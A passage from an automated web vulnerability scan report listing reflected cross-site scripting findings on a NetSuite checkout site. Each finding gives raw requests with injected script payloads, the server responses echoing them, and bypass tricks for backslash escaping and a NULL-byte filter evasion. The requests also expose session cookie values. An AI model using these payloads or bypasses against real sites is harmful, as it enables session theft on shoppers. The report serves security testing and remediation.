NS_RTIMER_COMPOSITE: 1112271019:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=929
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 14012


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title></title>


<meta name="robots" content="noindex,nofollow">
<script language='JavaScript' type='text/javascript
...[SNIP]...
<a href='https://checkout.netsuite.com/app/center/nlvisitor.nl?c=1034828&n=3ea1e0'a='b'a4e19e91a04&sc=6' class='errortext'>
...[SNIP]...

2.9. https://checkout.netsuite.com/app/site/backend/docrossdomainredirect.nl [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /app/site/backend/docrossdomainredirect.nl

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 12983'><script>alert(1)</script>f4dd61d6b9f81a0d8 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /app/site/backend/docrossdomainredirect.nl?redirect=12983'><script>alert(1)</script>f4dd61d6b9f81a0d8&docookiecheck=T&renderableItem=%2Fshow%2F8 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Cookie: __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.3.10.1290273104; JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; __utmc=1; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC; StoreEmail=rt'@1.com
Host: checkout.netsuite.com
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:47:52 GMT
Server: Apache
NS_RTIMER_COMPOSITE: 1214680267:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=xycPMyJR2XBPh6gH3Bbln7pTqfJz3PcHJpFnLJlWJ4gl5PTxysvL2bZkLNsVZjyG11m2hBJF2gRjn36cGTfh6d1RWCqK05P8KN1ymydhhpXph7JVYqHnpp1L3Hlnm4sQ!-548196153; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=944
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 233

<HTML>
<HEAD>
<meta HTTP-EQUIV='Content-Type' content='text/html; charset=utf-8'>
<META HTTP-EQUIV='REFRESH' CONTENT='0; URL="12983'><script>alert(1)</script>f4dd61d6b9f81a0d8"'>
<script>function OnBa
...[SNIP]...

2.10. https://checkout.netsuite.com/app/site/backend/docrossdomainredirect.nl [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /app/site/backend/docrossdomainredirect.nl

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 87277'><script>alert(1)</script>0d33e5361ab was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/site/backend/docrossdomainredirect.nl?redirect=%2Fs.nl%3Fc%3D1034828%26n%3D3%26sc%3D35%26category%3Dloginregister%26it%3DA%26login%3DT%26newcust%3DT87277'><script>alert(1)</script>0d33e5361ab&docookiecheck=T HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: checkout.netsuite.com
Connection: Keep-Alive
Cookie: __utma=1.2027734133.1289244024.1289244024.1289251037.2; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:21:44 GMT
Server: Apache
NS_RTIMER_COMPOSITE: 668352325:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=638
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 298

<HTML>
<HEAD>
<meta HTTP-EQUIV='Content-Type' content='text/html; charset=utf-8'>
<META HTTP-EQUIV='REFRESH' CONTENT='0; URL="/s.nl?c=1034828&n=3&sc=35&category=loginregister&it=A&login=T&newcust=T87277'><script>alert(1)</script>0d33e5361ab"'>
...[SNIP]...

2.11. https://checkout.netsuite.com/app/site/backend/docrossdomainredirect.nl [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /app/site/backend/docrossdomainredirect.nl

Issue detail

The value of the redirect request parameter is copied into the HTML document as plain text between tags. The payload f1799<script>alert(1)</script>85b0cbdcd5eeb48c1 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /app/site/backend/docrossdomainredirect.nl?redirect=%2Fs.nl%3Fc%3D1034828%26n%3D3%26sc%3D35%26category%3Dloginregister%26it%3DA%26login%3DT%26newcust%3DT87277'><script>alert(1)</script>0d33e5361abf1799<script>alert(1)</script>85b0cbdcd5eeb48c1&docookiecheck=T&renderableItem=%2Fshow%2F8 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Cookie: __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.3.10.1290273104; JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; __utmc=1; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC; StoreEmail=rt'@1.com
Host: checkout.netsuite.com
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:47:52 GMT
Server: Apache
NS_RTIMER_COMPOSITE: -704961802:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=xycPMyJR2XBPh6gH3Bbln7pTqfJz3PcHJpFnLJlWJ4gl5PTxysvL2bZkLNsVZjyG11m2hBJF2gRjn36cGTfh6d1RWCqK05P8KN1ymydhhpXph7JVYqHnpp1L3Hlnm4sQ!-548196153; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=988
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 345

<HTML>
<HEAD>
<meta HTTP-EQUIV='Content-Type' content='text/html; charset=utf-8'>
<META HTTP-EQUIV='REFRESH' CONTENT='0; URL="/s.nl?c=1034828&n=3&sc=35&category=loginregister&it=A&login=T&newcust=T872
...[SNIP]...
</script>0d33e5361abf1799<script>alert(1)</script>85b0cbdcd5eeb48c1"'>
...[SNIP]...

2.12. https://checkout.netsuite.com/c.1034828/site/drop_down_menu/anylinkcssmenu.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /c.1034828/site/drop_down_menu/anylinkcssmenu.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67a32"%3b9a1fdcd0d7 was submitted in the REST URL parameter 1. This input was echoed as 67a32";9a1fdcd0d7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /67a32"%3b9a1fdcd0d7/site/drop_down_menu/anylinkcssmenu.js HTTP/1.1
Accept: */*
Referer: https://checkout.netsuite.com/s.nl?c=1034828&sc=35&n=3&redirect_count=1&did_javascript_redirect=T
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: checkout.netsuite.com
Connection: Keep-Alive
Cookie: __utma=1.2027734133.1289244024.1289244024.1289251037.2; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC

Response

HTTP/1.1 404 Not Found
Date: Sat, 20 Nov 2010 17:28:59 GMT
Server: Apache
Content-Length: 2691
Expires: Sun, 21 Nov 2010 07:15:59 GMT
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
encoding: UTF-8
Content-Language: UTF-8
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=999
Connection: Keep-Alive
Content-Type: text/javascript; charset=UTF-8



...[SNIP]...

alert("Script file 'https://checkout.netsuite.com/67a32";9a1fdcd0d7/site/drop_down_menu/anylinkcssmenu.js' not found");



2.13. https://checkout.netsuite.com/citricle-ga/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /citricle-ga/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7175f\'%3balert(1)//122e2e8962c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7175f\\';alert(1)//122e2e8962c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /citricle-ga/?7175f\'%3balert(1)//122e2e8962c=1 HTTP/1.1
Host: checkout.netsuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; loginredirect=T; JSESSIONID=dhQMMyJDpGpPkZGgt12gQSdl2ZxqXVLWRpRGDFyvG6Jv4j6tbFfKcQZD64vmtnhKLhRymJDB9Fv1RDGJXWqCm5hvXJvNQ9fxsVfFB0tVjPwKYx6gZ1fBZsh1JQYRnRZG!-1642534427; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); StoreEmail=rt'@1.com; NLShopperId7=rnoX2qVXAQEJBIY6; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmc=1; __utmb=1.4.10.1290273104; NLShopperId=rnoX2lhXAQEmkIji;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:50:24 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 776630900:616363742D6A6176613039352E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=993
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 2351


<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
<script language='Javascript' type='text/javascript'>document.location.href='/s.nl?alias=citricle-ga&7175f\\';alert(1)//122e2e8962c=1&7175f\\'%3balert(1)//122e2e8962c=1&redirect_count=1&did_javascript_redirect=T'</script>
...[SNIP]...

2.14. https://checkout.netsuite.com/citricle-ga/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /citricle-ga/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5d377'%20style%3dx%3aexpression(alert(1))%20caad02a7c27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d377\' style=x:expression(alert(1)) caad02a7c27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /citricle-ga/?5d377'%20style%3dx%3aexpression(alert(1))%20caad02a7c27=1 HTTP/1.1
Host: checkout.netsuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; loginredirect=T; JSESSIONID=dhQMMyJDpGpPkZGgt12gQSdl2ZxqXVLWRpRGDFyvG6Jv4j6tbFfKcQZD64vmtnhKLhRymJDB9Fv1RDGJXWqCm5hvXJvNQ9fxsVfFB0tVjPwKYx6gZ1fBZsh1JQYRnRZG!-1642534427; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); StoreEmail=rt'@1.com; NLShopperId7=rnoX2qVXAQEJBIY6; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmc=1; __utmb=1.4.10.1290273104; NLShopperId=rnoX2lhXAQEmkIji;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:50:21 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 326838907:616363742D6A6176613039352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLShopperId3=rnoX2rlXAfN9aIpK; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:50:21 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAd5-aEcO; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:50:21 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=983
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 2435


<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
<a href='/s.nl?alias=citricle-ga&5d377\' style=x:expression(alert(1)) caad02a7c27=1&5d377\'%20style%3dx%3aexpression(alert(1))%20caad02a7c27=1'>
...[SNIP]...

2.15. https://checkout.netsuite.com/javascript/help.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /javascript/help.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49886"%3bd493f9d8869 was submitted in the REST URL parameter 1. This input was echoed as 49886";d493f9d8869 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /javascript49886"%3bd493f9d8869/help.js HTTP/1.1
Accept: */*
Referer: https://checkout.netsuite.com/s.nl
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: checkout.netsuite.com
Connection: Keep-Alive
Cookie: __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.4.10.1290273104; NS_VER=2010.2.0; JSESSIONID=dhQMMyJDpGpPkZGgt12gQSdl2ZxqXVLWRpRGDFyvG6Jv4j6tbFfKcQZD64vmtnhKLhRymJDB9Fv1RDGJXWqCm5hvXJvNQ9fxsVfFB0tVjPwKYx6gZ1fBZsh1JQYRnRZG!-1642534427; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC; StoreEmail=rt'@1.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 20 Nov 2010 17:50:29 GMT
Server: Apache
Content-Length: 2672
Expires: Sun, 21 Nov 2010 07:15:29 GMT
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
encoding: UTF-8
Content-Language: UTF-8
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=974
Connection: Keep-Alive
Content-Type: text/javascript; charset=UTF-8



...[SNIP]...

alert("Script file 'https://checkout.netsuite.com/javascript49886";d493f9d8869/help.js' not found");



2.16. https://checkout.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %009847a'style%3d'x%3aexpression(alert(1))'ba0bac45916 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9847a'style='x:expression(alert(1))'ba0bac45916 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

POST /s.nl HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://checkout.netsuite.com/s.nl?c=1034828&sc=4&n=3
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: checkout.netsuite.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; __utmb=1.1.10.1290273104; __utmc=1; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC; StoreEmail=rt'@1.com
Content-Length: 270

origsc=4&c=1034828&n=3&sc=4&category=shipping&id=&it=A&vid=rnoX2kNXAZKv7gpK&ck=rnoX2q9XAatYKaJC&cktime=87993&cart=148243&referer=https%3A%2F%2Fcheckout.netsuite.com%2Fs.nl%3Fc%3D1034828%26sc%3D4%26n%3D3&sShipMeth=12440&continueclicked=T&kReferralCode=&submitter=Continue&%009847a'style%3d'x%3aexpression(alert(1))'ba0bac45916=1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:28:55 GMT
Server: Apache
Cache-Control: max-age=300
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -704998492:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLShopperId3=rnoX2rlXAayZVN1c; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:28:56 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAayZVN1c; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:28:56 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAayZVN1c; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:28:56 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAayZVN1c; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:28:56 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=984
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 49868


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - Turner</title>


<meta name="robots" content="noindex,nofollow">
<script language='JavaScript' type
...[SNIP]...
<input type='hidden' name='referer' value='https://checkout.netsuite.com/s.nl?.9847a'style='x:expression(alert(1))'ba0bac45916=1&continueclicked=T&kReferralCode=&vid=rnoX2kNXAZKv7gpK&n=3&origsc=4&ck=rnoX2q9XAatYKaJC&sShipMeth=12440&cart=148243&submitter=Continue&cktime=87993'>
...[SNIP]...

2.17. https://checkout.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8bc49'style%3d'x%3aexpression(alert(1))'02b68d32520 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8bc49'style='x:expression(alert(1))'02b68d32520 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /s.nl HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://checkout.netsuite.com/s.nl/c.1034828/n.3/sc.4/category.shipping/.f
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: checkout.netsuite.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; __utmb=1.1.10.1290273104; __utmc=1; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC; StoreEmail=rt'@1.com
Content-Length: 276

origsc=4&c=1034828&n=3&sc=4&category=shipping&id=&it=A&vid=rnoX2kNXAZKv7gpK&ck=rnoX2q9XAatYKaJC&cktime=87993&cart=148243&referer=https%3A%2F%2Fcheckout.netsuite.com%2Fs.nl%3Fc%3D1034828%26sc%3D4%26category%3Dshipping%26n%3D3&sShipMeth=12440&continueclicked=T&kReferralCode=%27&8bc49'style%3d'x%3aexpression(alert(1))'02b68d32520=1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:32:28 GMT
Server: Apache
Cache-Control: max-age=300
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1160675152:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLShopperId3=rnoX2rlXAbAOWAq7; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:32:29 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAbAOWAq7; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:32:29 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAbAOWAq7; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:32:29 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAbAOWAq7; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:32:29 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAbAOWAq7; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:32:29 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAbAOWAq7; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:32:29 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=990
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 52738


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - Turner</title>


<meta name="robots" content="noindex,nofollow">
<script language='JavaScript' type
...[SNIP]...
